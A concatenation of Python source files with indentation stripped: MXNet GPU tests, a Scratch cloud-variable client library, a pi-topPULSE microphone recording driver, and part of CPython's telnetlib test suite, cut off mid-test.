fully_bulked_time = times[(15,15,True)]
print(times_str)
# Non-bulked times[0,0,True], times[1,1,True] and times[15,15,False] should be about the same,
# slower than both half-bulked times[0,15,True] and times[15,0,True]
assert slowest_half_bulked_time < fastest_non_bulked_time, \
'A half-bulked exec time is slower than the non-bulked time by {} secs! {}' \
.format(slowest_half_bulked_time - fastest_non_bulked_time, times_str)
# The fully bulked times[15,15,True] should be faster than both half-bulked runs
assert fully_bulked_time < fastest_half_bulked_time, \
'The fully-bulked exec time is slower than a half-bulked time by {} secs! {}' \
.format(fully_bulked_time - fastest_half_bulked_time, times_str)
@with_seed()
@pytest.mark.serial
def test_allclose_function_gpu():
allclose_function([mx.cpu(), mx.gpu(0)])
def test_context_num_gpus():
# Test that num_gpus reports at least one GPU, as the test is run on a GPU host.
assert mx.context.num_gpus() > 0
def math_log(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.log(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.log(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def math_erf(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.erf(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.erf(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def math_square(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.square(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.square(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def run_math(op, shape, dtype="float32", check_value=True):
run_num = 10
for i in range(run_num):
if op == 'log':
math_log(shape=shape, dtype=dtype, check_value=check_value)
elif op == 'erf':
math_erf(shape=shape, dtype=dtype, check_value=check_value)
elif op == 'square':
math_square(shape=shape, dtype=dtype, check_value=check_value)
@with_seed()
@pytest.mark.serial
def test_math():
ops = ['log', 'erf', 'square']
check_value= True
shape_lst = [[1000], [100,1000], [10,100,100], [10,100,100,100]]
dtypes = ["float32", "float64"]
for shape in shape_lst:
for dtype in dtypes:
for op in ops:
run_math(op, shape, dtype, check_value=check_value)
@with_seed()
@pytest.mark.serial
def test_arange_like_dtype():
dtypes = [np.float16, np.float32, np.float64]
for t in dtypes:
x = mx.sym.Variable('x', dtype=t)
y = mx.sym.reshape(x, shape=(0, 0, -1))
z = mx.sym.contrib.arange_like(y, axis=-1)
mod = z.simple_bind(ctx=mx.gpu(0), x=(3, 4, 5, 6), grad_req='null')
mod.arg_arrays[0][:] = np.random.normal(size=mod.arg_arrays[0].shape).astype(t)
out = mod.forward(is_train=False)
for v in out:
assert v.dtype == t
|
code.py
|
import json
import websocket
import re
import requests
import colorama
from colorama import Fore
import threading
import time
import asyncio
import inspect
import os
import datetime
class Client:
def __init__(self, username, password, source=None):
"""
Creates a Scratch Client so you can start connecting to your projects.
*Note: Your Password and Username are not stored both globally and locally!
:param username: Your Scratch Username
:param password: Your Scratch Password
:Param source: Normally set this param to __file__ to allow suggested lines
:return: None
:rtype: Undefined
"""
colorama.init()
self.sessionID = None
self.discord_link = "https://discord.gg/tF7j7MswUS"
self.username = username
self.password = password
self.source = source
self.meta = None
self.headers = {
"x-csrftoken": "a",
"x-requested-with": "XMLHttpRequest",
"Cookie": "scratchcsrftoken=a;scratchlanguage=en;",
"referer": "https://scratch.mit.edu",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36"
}
try:
self.data = json.dumps({
"username": self.username,
"password": self.password
})
request = requests.post(
'https://scratch.mit.edu/login/', data=self.data, headers=self.headers)
self.sessionId = re.search(
'\"(.*)\"', request.headers['Set-Cookie']).group()
self.token = request.json()[0]["token"]
self.headers = {
"x-requested-with": "XMLHttpRequest",
"Cookie": "scratchlanguage=en;permissions=%7B%7D;",
"referer": "https://scratch.mit.edu",
}
self.request = requests.get(
"https://scratch.mit.edu/csrf_token/", headers=self.headers)
self.csrftoken = re.search(
"scratchcsrftoken=(.*?);", request.headers["Set-Cookie"]
).group(1)
except AttributeError as error:
if source != None:
self.error_proxy = error
self.file = open(self.source, "r", encoding='UTF-8')
self.line = ""
self.count = 0
for i in self.file:
self.count += 1
if 'client' in i.lower():
self.line = i
break
self.message = f"{Fore.RED}[scratchon] Invalid Credentials!\n{Fore.YELLOW} Tip: Double check to make sure your username and password are correct\n {Fore.BLUE} Suggested Line:\n {Fore.WHITE} Line: {self.count} | {self.line} {Fore.MAGENTA}Still Having Trouble? Join Our Discord Community: {self.discord_link} {Fore.RESET}"
print(self.message)
else:
self.message = f"{Fore.RED}[scratchon] Invalid Credentials!\n{Fore.YELLOW} Tip: Double check to make sure your username and password are correct\n {Fore.BLUE} Suggested Line:\n {Fore.WHITE} Define source in Client() to get suggestions\n scratchon.Client(source=__file__, ...) {Fore.MAGENTA}Still Having Trouble? Join Our Discord Community: {self.discord_link} {Fore.RESET}"
print(self.message)
else:
self.message = f"{Fore.GREEN}[scratchon] Logged in as: {username}\n{Fore.RESET} You will be automatically signed out of your scratch account!"
print(self.message)
self.headers = {
"x-csrftoken": self.csrftoken,
"X-Token": self.token,
"x-requested-with": "XMLHttpRequest",
"Cookie": "scratchcsrftoken=" + self.csrftoken + ";scratchlanguage=en;scratchsessionsid=" + self.sessionId + ";",
"referer": "",
}
def manage(self, project_id: int, codec_method=None, compare="time"):
"""
This is one of the most important methods, as it allows to connect your scratch and python project.
:param project_id: The id of your scratch project you wish to connect to.
:param compare: The way to compare cloud variables (time, or value)
:return: Project instance
:rtype: object
"""
if codec_method != None:
self.meta = use_file_for_codec(codec_method, self.discord_link)
try:
return Manage(project_id, self.sessionId, self.username, self.discord_link, source=self.source, codec_method=self.meta, compare=compare)
except:
self.message = f"{Fore.RED}[scratchon] Prior Exception\n{Fore.YELLOW} Tip: Check to see if any error's occured prior to this message\n {Fore.MAGENTA}Still Having Trouble? Join Our Discord Community: {self.discord_link} {Fore.RESET}"
print(self.message)
class Variable:
def __init__(self, last_value, current_value, name, project_owner, project_id, origin):
"""
A(n) object representing a scratch cloud variable
:param last_value: Undefined
:param current_value: Undefined
:param name: Undefined
:param project_owner: Undefined
:param project_id: Undefined
:param origin: Undefined
"""
self.last_value = last_value
self.current_value = current_value
self.raw_name = name
self.name = self.raw_name.split('☁ ')[1]
self.project_owner = project_owner
self.project_id = project_id
self.object = origin
def serve_file(path):
return path
def use_file_for_codec(path, discord_link):
if os.path.isfile(path):
file = open(path)
root = {}
counter = 0
for lines in file:
counter += 1
if lines != '\n':
root[lines.replace('\n', '')] = counter
file.close()
return CreateCodecClass(root)
else:
print(f"{Fore.RED}[scratchon] File Not Served\n{Fore.YELLOW} Tip: Check to see if the file path is correct\n {Fore.MAGENTA}Still Having Trouble? Join Our Discord Community: {discord_link} {Fore.RESET}")
class CreateCodecClass:
def __init__(self, root):
self.root = root
self.temp = None
self.letter = None
self.data = None
def _encode(self, data):
self.temp = ""
for letter in data:
self.temp += str(self.root[letter])
return self.temp
def _decode(self, data):
self.data = str(data)
self.temp = ""
for times in range(0, len(self.data), 2):
self.letter = self.data[times] + self.data[times + 1]
self.temp += self.get_key(int(self.letter))
return self.temp
def get_key(self, val):
for key, value in self.root.items():
if val == value:
return key
class Manage:
def __init__(self, project_id, session_id, username, discord_link, source, codec_method, compare):
"""
A(n) object that represents your scratch project, not meant to be used by the user.
:param project_id: Undefined
:param session_id: Undefined
:param username: Undefined
:param discord_link: https://discord.gg/tF7j7MswUS
:param codec_method: Undefined
"""
self.ws = websocket.WebSocket()
self.project_id, self.session_id, self.username = project_id, session_id, username
self.proxy_response = None
self.websocket_connected = True
self.proxy_calls = 0
self.discord_link = discord_link
self.var_object = None
self.stats, self.message, self.counter = None, None, 0
self.source = source
self.codec_method = codec_method
self.is_using_codec = codec_method
self.callback_directory = {}
self.event_dictionary = ['cloud_update', 'connected', 'tick']
self.responses = []
self.cloud_last_values = {}
self.cloud_last_timestamp = {}
self.compare_via = compare.lower()
self._created_at = datetime.datetime.now()
self.receive_type = None
self.ws.connect('wss://clouddata.scratch.mit.edu', cookie='scratchsessionsid=' + self.session_id + ';',
origin='https://scratch.mit.edu', enable_multithread=True)
self.proxy_response = self.ws.send(json.dumps({
'method': 'handshake',
'user': self.username,
'project_id': str(self.project_id)
}) + '\n')
def call_scratch_api():
while self.websocket_connected:
try:
self.response = requests.get("https://clouddata.scratch.mit.edu/logs?projectid=" + str(
self.project_id) + "&limit=25" + "&offset=0").json()
self.response = self.response[0]
self.var_name = self.response['name']
self.var_value = self.response['value']
self.epoch = self.response['timestamp']
self.action = self.response['verb']
self.when = datetime.datetime.fromtimestamp(self.epoch / 1000.0)
self.dif = self.when - self._created_at
self.proxy_calls += 1
if self.compare_via == "value":
if self.var_name not in self.cloud_last_values:
self.cloud_last_values[self.var_name] = self.var_value
if self.cloud_last_values[self.var_name] != self.var_value:
if 'cloud_update' in self.callback_directory.keys():
self.var_object = Variable(self.cloud_last_values[self.var_name], self.var_value,
self.var_name, self.username, self.project_id, self)
if self.receive_type == object:
threading.Thread(target=asyncio.run, args=(
self.callback_directory['cloud_update'](variable=self.var_object),)).start()
else:
pass
self.cloud_last_values[self.var_name] = self.var_value
elif self.compare_via == "time":
pass
self.responses.append(self.response)
time.sleep(0.25)
if 'tick' in self.callback_directory.keys():
threading.Thread(target=asyncio.run, args=(
self.callback_directory['tick'](),)).start()
if int(self.proxy_response) == 82:
if 'connected' in self.callback_directory.keys() and self.proxy_calls < 2:
threading.Thread(target=asyncio.run, args=(
self.callback_directory['connected'](),)).start()
else:
self.file = open(self.source, "r", encoding='UTF-8')
self.line = ""
self.count = 0
for i in self.file:
self.count += 1
if str(self.project_id) in i.lower():
self.line = i
break
self.message = f"{Fore.RED}[scratchon] Could Not Connect To Project: ID: {self.project_id}\n{Fore.YELLOW} Tip: Double check to make sure your this project has atleast 1 cloud variable and/or the project id is correct!\n {Fore.BLUE} Suggested Line:\n {Fore.WHITE} Line: {self.count} | {self.line} {Fore.MAGENTA}Still Having Trouble? Join Our Discord Community: {self.discord_link} {Fore.RESET}"
print(self.message)
except Exception as error:
print(error)
self.message = f"{Fore.RED}[scratchon] [502] Too Much Gateway Traffic for Project: ID: {self.project_id}\n{Fore.YELLOW} We have slowed down requests for 5 seconds to help.\n{Fore.RESET} Full Traceback: {error}"
print(self.message)
time.sleep(5)
self.main_loop = threading.Thread(target=call_scratch_api)
self.main_loop.start()
async def stop(self):
"""
Stops the connection to your scratch project.
:return: None
"""
self.websocket_connected = False
self.ws.close()
self.stats = await self.get_stats()
if self.counter < 1:
self.message = f"{Fore.GREEN}[scratchon] Closed Connection To: {self.stats.title}\n{Fore.RESET} You will no longer be able to use methods with this project, unless reconnected!"
print(self.message)
self.counter += 1
del self
def on(self, event):
"""
This decorator decorates your function so it is called when a event happens within your scratch project.
:param event: The type of event
:return: Wrapper
"""
def wrapper(function):
if str(event.lower()).startswith("?"):
self.callback_directory[event.lower()[1:]] = function
else:
if str(event.lower()) in self.event_dictionary:
self.callback_directory[event.lower()] = function
if event.lower() == 'cloud_update':
funonstring = str(inspect.signature(function))
funonstring = funonstring.replace('(', '')
funonstring = funonstring.replace(')', '')
funonstring = funonstring.replace(' ', '')
funonstring = funonstring.split(",")[0]
funonstring = funonstring.split(':')
self.receive_type = None
if len(funonstring) == 1:
self.receive_type = object
else:
if funonstring[1] == 'list':
self.receive_type = list
elif funonstring[1] == 'object':
self.receive_type = object
else:
self.message = f"{Fore.RED}[scratchon] return type can only be 'list' or 'object'\n{Fore.MAGENTA} Still Having Trouble? Join Our Discord Community: {self.discord_link} {Fore.RESET}"
print(self.message)
else:
self.message = f"{Fore.RED}[scratchon] Invalid Event: event {str(event.lower())} not found\n{Fore.YELLOW} Tip: Make sure to check you spelled the event name correctly, else, add a ? to event name to make it a custom event\n{Fore.MAGENTA} Still Having Trouble? Join Our Discord Community: {self.discord_link} {Fore.RESET}"
print(self.message)
return wrapper
async def get_stats(self):
"""
Gets the stats of your scratch project.
:return: Project instance
:rtype: object
"""
self.proxy_response = requests.get('https://api.scratch.mit.edu/projects/' + str(self.project_id)).json()
return Project(self.proxy_response)
async def set_variable(self, variable, value):
try:
self.ws.send(json.dumps({
'method': 'set',
'name': '☁ ' + variable,
'value': str(value),
'user': self.username,
'project_id': self.project_id
}) + '\n')
except BrokenPipeError:
print('Broken Pipe Error. Connection Lost.')
self.ws.connect('wss://clouddata.scratch.mit.edu', cookie='scratchsessionsid=' + self.session_id + ';',
origin='https://scratch.mit.edu', enable_multithread=True)
self.ws.send(json.dumps({
'method': 'handshake',
'user': self.username,
'project_id': str(self.project_id)
}) + '\n')
print('Re-connected to wss://clouddata.scratch.mit.edu')
print('Re-sending the data')
self.ws.send(json.dumps({
'method': 'set',
'name': '☁ ' + variable,
'value': str(value),
'user': self.username,
'project_id': self.project_id
}) + '\n')
async def get_variable(self, name: str, limit: str = "1000") -> str:
try:
resp = requests.get("https://clouddata.scratch.mit.edu/logs?projectid=" +
str(self.project_id) + "&limit=" + str(limit) + "&offset=0").json()
for i in resp:
x = i['name']
if x == ('☁ ' + str(name)):
return i['value']
except Exception:
raise Exception('Cloud variable could not be read.')
def encode(self, value):
if self.is_using_codec == None:
self.message = f"{Fore.RED}[scratchon] No codec_method has been set for Project: ID: {self.project_id}\n{Fore.YELLOW} Tip: Make sure to serve a file in scratchon.Client().manage()\n{Fore.MAGENTA} Still Having Trouble? Join Our Discord Community: {self.discord_link} {Fore.RESET}"
print(self.message)
else:
return self.codec_method._encode(value)
def decode(self, value):
if self.is_using_codec == None:
self.message = f"{Fore.RED}[scratchon] No codec_method has been set for Project: ID: {self.project_id}\n{Fore.YELLOW} Tip: Make sure to serve a file in scratchon.Client().manage()\n{Fore.MAGENTA} Still Having Trouble? Join Our Discord Community: {self.discord_link} {Fore.RESET}"
print(self.message)
else:
return self.codec_method._decode(value)
class Project:
def __init__(self, data):
for key in data:
setattr(self, key, data[key])
self.raw = data
def main(myself):
discord_link = "https://discord.gg/tF7j7MswUS"
if not isinstance(myself, Client):
print(f"{Fore.RED}[scratchon] Must run scratchon.main() on scratchon.Client()\n{Fore.YELLOW} Tip: Check to see if scratchon.Client() is a argument in scratchon.main()\n {Fore.MAGENTA}Still Having Trouble? Join Our Discord Community: {discord_link} {Fore.RESET}")
else:
while True:
pass
# In the works
class ExtensionManager:
def __init__(self):
self.extension_manual = None
self.check = None
self.version = 0.1
self.lol = None
self.later = "ate"
|
microphone.py
|
# microphone.py (pi-topPULSE)
# Copyright (C) 2017 CEED ltd.
#
import codecs
import binascii
import math
from tempfile import mkstemp
import os
import serial
import signal
import struct
import sys
from threading import Thread
import time
# local
from ptpulse import configuration
_debug = False
_bitrate = 8
_continue_writing = False
_recording_thread = False
_thread_running = False
_exiting = False
_temp_file_path = ""
#######################
# INTERNAL OPERATIONS #
#######################
def _debug_print(message):
"""INTERNAL. Print messages if debug mode enabled."""
if _debug == True:
print(message)
def _signal_handler(signal, frame):
"""INTERNAL. Handles signals from the OS."""
global _exiting
if _exiting == False:
_exiting = True
if _thread_running == True:
stop()
print("\nQuitting...")
sys.exit(0)
def _get_size(filename):
"""INTERNAL. Gets the size of a file."""
file_stats = os.stat(filename)
return file_stats.st_size
def _from_hex(value):
"""INTERNAL. Gets a bytearray from hex data."""
return bytearray.fromhex(value)
def _space_separated_little_endian(integer_value, byte_len):
"""INTERNAL. Get an integer in format for WAV file header."""
if byte_len <= 1:
pack_type = '<B'
elif byte_len <= 2:
pack_type = '<H'
elif byte_len <= 4:
pack_type = '<I'
elif byte_len <= 8:
pack_type = '<Q'
else:
print("Value cannot be represented in 8 bytes - exiting")
sys.exit()
hex_string = struct.pack(pack_type, integer_value)
temp = binascii.hexlify(hex_string).decode()
return ' '.join([temp[i:i+2] for i in range(0, len(temp), 2)])
def _init_header_information():
"""INTERNAL. Create a WAV file header."""
RIFF = "52 49 46 46"
WAVE = "57 41 56 45"
fmt = "66 6d 74 20"
DATA = "64 61 74 61"
if configuration.microphone_sample_rate_is_22khz():
capture_sample_rate = 22050
else:
capture_sample_rate = 16000
header = _from_hex(RIFF) # ChunkID
header += _from_hex(_space_separated_little_endian(0, 4)) # ChunkSize - 4 bytes (to be changed depending on length of data...)
header += _from_hex(WAVE) # Format
header += _from_hex(fmt) # Subchunk1ID
header += _from_hex(_space_separated_little_endian(16, 4)) # Subchunk1Size (PCM = 16)
header += _from_hex(_space_separated_little_endian(1, 2)) # AudioFormat (PCM = 1)
header += _from_hex(_space_separated_little_endian(1, 2)) # NumChannels
header += _from_hex(_space_separated_little_endian(capture_sample_rate, 4)) # SampleRate
header += _from_hex(_space_separated_little_endian(capture_sample_rate, 4)) # ByteRate (Same as SampleRate due to 1 channel, 1 byte per sample)
header += _from_hex(_space_separated_little_endian(1, 2)) # BlockAlign - (no. of bytes per sample)
header += _from_hex(_space_separated_little_endian(_bitrate, 2)) # BitsPerSample
header += _from_hex(DATA) # Subchunk2ID
header += _from_hex(_space_separated_little_endian(0, 4)) # Subchunk2Size - 4 bytes (to be changed depending on length of data...)
return header
def _update_header_in_file(file, position, value):
"""INTERNAL. Update the WAV header """
hex_value = _space_separated_little_endian(value, 4)
data = binascii.unhexlify(''.join(hex_value.split()))
file.seek(position)
file.write(data)
def _finalise_wav_file(file_path):
"""INTERNAL. Update the WAV file header with the size of the data."""
size_of_data = _get_size(file_path) - 44
if size_of_data <= 0:
print("Error: No data was recorded!")
os.remove(file_path)
else:
with open(file_path, 'rb+') as file:
_debug_print("Updating header information...")
_update_header_in_file(file, 4, size_of_data + 36)
_update_header_in_file(file, 40, size_of_data)
def _thread_method():
"""INTERNAL. Thread method."""
_record_audio_to_file()
def _record_audio():
"""INTERNAL. Open the serial port and capture audio data. Function is a generator yielding data as it is read"""
if os.path.exists('/dev/serial0'):
_debug_print("Opening serial device...")
serial_device = serial.Serial(port = '/dev/serial0', timeout = 1, baudrate = 250000, parity = serial.PARITY_NONE, stopbits = serial.STOPBITS_ONE, bytesize = serial.EIGHTBITS)
serial_device_open = serial_device.isOpen()
if serial_device_open == True:
try:
_debug_print("Start recording")
if serial_device.inWaiting():
_debug_print("Flushing input and starting from scratch")
serial_device.flushInput()
_debug_print("WRITING: wave data")
while _continue_writing:
while not serial_device.inWaiting():
time.sleep(0.01)
audio_output = serial_device.read(serial_device.inWaiting())
if sys.version_info >= (3, 0):
bytes_to_write = bytearray()
else:
bytes_to_write = ""
for pcm_data_block in audio_output:
if _bitrate == 16:
pcm_data_int = 0
if sys.version_info >= (3, 0):
pcm_data_int = pcm_data_block
scaled_val = int((pcm_data_int * 32768) / 255)
bytes_to_write += _from_hex(_space_separated_little_endian(scaled_val, 2))
else:
pcm_data_int = ord(pcm_data_block)
scaled_val = int((pcm_data_int * 32768) / 255)
bytes_to_write += _from_hex(_space_separated_little_endian(scaled_val, 2))
else:
if sys.version_info >= (3, 0):
pcm_data_int = pcm_data_block
bytes_to_write += _from_hex(_space_separated_little_endian(pcm_data_int, 1))
else:
pcm_data_int = ord(pcm_data_block)
bytes_to_write += _from_hex(_space_separated_little_endian(pcm_data_int, 1))
yield bytes(bytes_to_write)
time.sleep(0.1)
finally:
serial_device.close()
_debug_print("Finished Recording.")
else:
print("Error: Serial port failed to open")
else:
print("Error: Could not find serial port - are you sure it's enabled?")
def _record_audio_to_file():
"""INTERNAL. Use the _record_audio generator to record audio to a temporary file"""
global _temp_file_path
temp_file_tuple = mkstemp()
os.close(temp_file_tuple[0])
_temp_file_path = temp_file_tuple[1]
try:
_debug_print("Start recording")
with open(_temp_file_path, 'wb') as file:
_debug_print("WRITING: initial header information")
file.write(_init_header_information())
_debug_print("WRITING: wave data")
for data in _record_audio():
file.write(data)
finally:
_finalise_wav_file(_temp_file_path)
_debug_print("Finished Recording.")
#######################
# EXTERNAL OPERATIONS #
#######################
def set_debug_print_state(debug_enable):
"""Enable/disable debug prints"""
global _debug
_debug = debug_enable
def record():
"""Start recording on the pi-topPULSE microphone to a file"""
global _thread_running
global _continue_writing
global _recording_thread
if not configuration.mcu_enabled():
print("Error: pi-topPULSE is not initialised.")
sys.exit()
if _thread_running == False and _continue_writing == False:
_thread_running = True
_continue_writing = True
_recording_thread = Thread(group=None, target=_thread_method)
_recording_thread.start()
else:
print("Microphone is already recording!")
def stream_audio():
"""Start recording on the pi-topPULSE microphone - returns a generator yielding audio data as it is read in."""
global _thread_running
global _continue_writing
if not configuration.mcu_enabled():
print("Error: pi-topPULSE is not initialised.")
sys.exit()
if _thread_running == False and _continue_writing == False:
_continue_writing = True
return _record_audio()
else:
print("Microphone is already recording!")
def is_recording():
"""Returns recording state of the pi-topPULSE microphone."""
return _thread_running
def stop():
"""Stops recording audio"""
global _thread_running
global _continue_writing
_continue_writing = False
if _thread_running:
_recording_thread.join()
_thread_running = False
def save(file_path, overwrite=False):
"""Saves recorded audio to a file."""
global _temp_file_path
if _thread_running == False:
if _temp_file_path != "" and os.path.exists(_temp_file_path):
if os.path.exists(file_path) == False or overwrite == True:
if os.path.exists(file_path):
os.remove(file_path)
os.rename(_temp_file_path, file_path)
_temp_file_path = ""
else:
print("File already exists")
else:
print("No recorded audio data found")
else:
print("Microphone is still recording!")
def set_sample_rate_to_16khz():
"""Set the appropriate I2C bits to enable 16,000Hz recording on the microphone"""
configuration.set_microphone_sample_rate_to_16khz()
def set_sample_rate_to_22khz():
"""Set the appropriate I2C bits to enable 22,050Hz recording on the microphone"""
configuration.set_microphone_sample_rate_to_22khz()
def set_bit_rate_to_unsigned_8():
"""Set bitrate to device default"""
global _bitrate
_bitrate = 8
def set_bit_rate_to_signed_16():
"""Set bitrate to double that of device default by scaling the signal"""
global _bitrate
_bitrate = 16
#######################
# INITIALISATION #
#######################
_signal = signal.signal(signal.SIGINT, _signal_handler)
|
test_telnetlib.py
|
import socket
import selectors
import telnetlib
import threading
import contextlib
from test import support
from test.support import socket_helper
import unittest
HOST = socket_helper.HOST
def server(evt, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
conn.close()
except socket.timeout:
pass
finally:
serv.close()
class GeneralTests(unittest.TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(60) # Safety net. Look issue 11812
self.port = socket_helper.bind_port(self.sock)
self.thread = threading.Thread(target=server, args=(self.evt,self.sock))
self.thread.setDaemon(True)
self.thread.start()
self.evt.wait()
def tearDown(self):
self.thread.join()
del self.thread # Clear out any dangling Thread objects.
def testBasic(self):
# connects
telnet = telnetlib.Telnet(HOST, self.port)
telnet.sock.close()
def testContextManager(self):
with telnetlib.Telnet(HOST, self.port) as tn:
self.assertIsNotNone(tn.get_socket())
self.assertIsNone(tn.get_socket())
def testTimeoutDefault(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
telnet = telnetlib.Telnet(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testTimeoutNone(self):
# None, having other default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
telnet = telnetlib.Telnet(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(telnet.sock.gettimeout() is None)
telnet.sock.close()
def testTimeoutValue(self):
telnet = telnetlib.Telnet(HOST, self.port, timeout=30)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testTimeoutOpen(self):
telnet = telnetlib.Telnet()
telnet.open(HOST, self.port, timeout=30)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testGetters(self):
# Test telnet getter methods
telnet = telnetlib.Telnet(HOST, self.port, timeout=30)
t_sock = telnet.sock
self.assertEqual(telnet.get_socket(), t_sock)
self.assertEqual(telnet.fileno(), t_sock.fileno())
telnet.sock.close()
class SocketStub(object):
''' a socket proxy that re-defines sendall() '''
def __init__(self, reads=()):
self.reads = list(reads) # Intentionally make a copy.
self.writes = []
self.block = False
def sendall(self, data):
self.writes.append(data)
def recv(self, size):
out = b''
while self.reads and len(out) < size:
out += self.reads.pop(0)
if len(out) > size:
self.reads.insert(0, out[size:])
out = out[:size]
return out
class TelnetAlike(telnetlib.Telnet):
def fileno(self):
raise NotImplementedError()
def close(self): pass
def sock_avail(self):
return (not self.sock.block)
def msg(self, msg, *args):
with support.captured_stdout() as out:
telnetlib.Telnet.msg(self, msg, *args)
self._messages += out.getvalue()
return
class MockSelector(selectors.BaseSelector):
def __init__(self):
self.keys = {}
@property
def resolution(self):
return 1e-3
def register(self, fileobj, events, data=None):
key = selectors.SelectorKey(fileobj, 0, events, data)
self.keys[fileobj] = key
return key
def unregister(self, fileobj):
return self.keys.pop(fileobj)
def select(self, timeout=None):
block = False
for fileobj in self.keys:
if isinstance(fileobj, TelnetAlike):
block = fileobj.sock.block
break
if block:
return []
else:
return [(key, key.events) for key in self.keys.values()]
def get_map(self):
return self.keys
@contextlib.contextmanager
def test_socket(reads):
def new_conn(*ignored):
return SocketStub(reads)
try:
old_conn = socket.create_connection
socket.create_connection = new_conn
yield None
finally:
socket.create_connection = old_conn
return
def test_telnet(reads=(), cls=TelnetAlike):
''' return a telnetlib.Telnet object that uses a SocketStub with
reads queued up to be read '''
for x in reads:
assert type(x) is bytes, x
with test_socket(reads):
telnet = cls('dummy', 0)
telnet._messages = '' # debuglevel output
return telnet
class ExpectAndReadTestCase(unittest.TestCase):
def setUp(self):
self.old_selector = telnetlib._TelnetSelector
telnetlib._TelnetSelector = MockSelector
def tearDown(self):
telnetlib._TelnetSelector = self.old_selector
class ReadTests(ExpectAndReadTestCase):
def test_read_until(self):
"""
read_until(expected, timeout=None)
test the blocking version of read_util
"""
want = [b'xxxmatchyyy']
telnet = test_telnet(want)
data = telnet.read_until(b'match')
self.assertEqual(data, b'xxxmatch', msg=(telnet.cookedq, telnet.rawq, telnet.sock.reads))
reads = [b'x' * 50, b'match', b'y' * 50]
expect = b''.join(reads[:-1])
telnet = test_telnet(reads)
data = telnet.read_until(b'match')
self.assertEqual(data, expect)
def test_read_all(self):
"""
read_all()
Read all data until EOF; may block.
"""
reads = [b'x' * 500, b'y' * 500, b'z' * 500]
expect = b''.join(reads)
telnet = test_telnet(reads)
data = telnet.read_all()
self.assertEqual(data, expect)
return
def test_read_some(self):
"""
read_some()
Read at least one byte or EOF; may block.
"""
# test 'at least one byte'
telnet = test_telnet([b'x' * 500])
data = telnet.read_some()
self.assertTrue(len(data) >= 1)
# test EOF
telnet = test_telnet()
data = telnet.read_some()
self.assertEqual(b'', data)
def _read_eager(self, func_name):
"""
read_*_eager()
Read all data available already queued or on the socket,
without blocking.
"""
want = b'x' * 100
telnet = test_telnet([want])
func = getattr(telnet, func_name)
telnet.sock.block = True
self.assertEqual(b'', func())
telnet.sock.block = False
data = b''
while True:
try:
data += func()
except EOFError:
break
self.assertEqual(data, want)
def test_read_eager(self):
# read_eager and read_very_eager make the same guarantees
# (they behave differently but we only test the guarantees)
self._read_eager('read_eager')
self._read_eager('read_very_eager')
# NB -- we need to test the IAC block which is mentioned in the
# docstring but not in the module docs
def read_very_lazy(self):
want = b'x' * 100
telnet = test_telnet([want])
self.assertEqual(b'', telnet.read_very_lazy())
while telnet.sock.reads:
telnet.fill_rawq()
data = telnet.read_very_lazy()
self.assertEqual(want, data)
self.assertRaises(EOFError, telnet.read_very_lazy)
def test_read_lazy(self):
want = b'x' * 100
telnet = test_telnet([want])
self.assertEqual(b'', telnet.read_lazy())
data = b''
while True:
try:
read_data = telnet.read_lazy()
data += read_data
if not read_data:
telnet.fill_rawq()
except EOFError:
break
self.assertTrue(want.startswith(data))
self.assertEqual(data, want)
class nego_collector(object):
def __init__(self, sb_getter=None):
self.seen = b''
self.sb_getter = sb_getter
self.sb_seen = b''
def do_nego(self, sock, cmd, opt):
self.seen += cmd + opt
if cmd == tl.SE and self.sb_getter:
sb_data = self.sb_getter()
self.sb_seen += sb_data
tl = telnetlib
class WriteTests(unittest.TestCase):
'''The only thing that write does is replace each tl.IAC for
tl.IAC+tl.IAC'''
def test_write(self):
data_sample = [b'data sample without IAC',
b'data sample with' + tl.IAC + b' one IAC',
b'a few' + tl.IAC + tl.IAC + b' iacs' + tl.IAC,
tl.IAC,
b'']
for data in data_sample:
telnet = test_telnet()
telnet.write(data)
written = b''.join(telnet.sock.writes)
self.assertEqual(data.replace(tl.IAC,tl.IAC+tl.IAC), written)
class OptionTests(unittest.TestCase):
# RFC 854 commands
cmds = [tl.AO, tl.AYT, tl.BRK, tl.EC, tl.EL, tl.GA, tl.IP, tl.NOP]
def _test_command(self, data):
""" helper for testing IAC + cmd """
telnet = test_telnet(data)
data_len = len(b''.join(data))
nego = nego_collector()
telnet.set_option_negotiation_callback(nego.do_nego)
txt = telnet.read_all()
cmd = nego.seen
self.assertTrue(len(cmd) > 0) # we expect at least one command
self.assertIn(cmd[:1], self.cmds)
self.assertEqual(cmd[1:2], tl.NOOPT)
self.assertEqual(data_len, len(txt + cmd))
nego.sb_getter = None # break the nego => telnet cycle
def test_IAC_commands(self):
for cmd in self.cmds:
self._test_command([tl.IAC, cmd])
self._test_command([b'x' * 100, tl.IAC, cmd, b'y'*100])
self._test_command([b'x' * 10, tl.IAC, cmd, b'y'*10])
# all at once
self._test_command([tl.IAC + cmd for (cmd) in self.cmds])
def test_SB_commands(self):
# RFC 855, subnegotiations portion
send = [tl.IAC + tl.SB + tl.IAC + tl.SE,
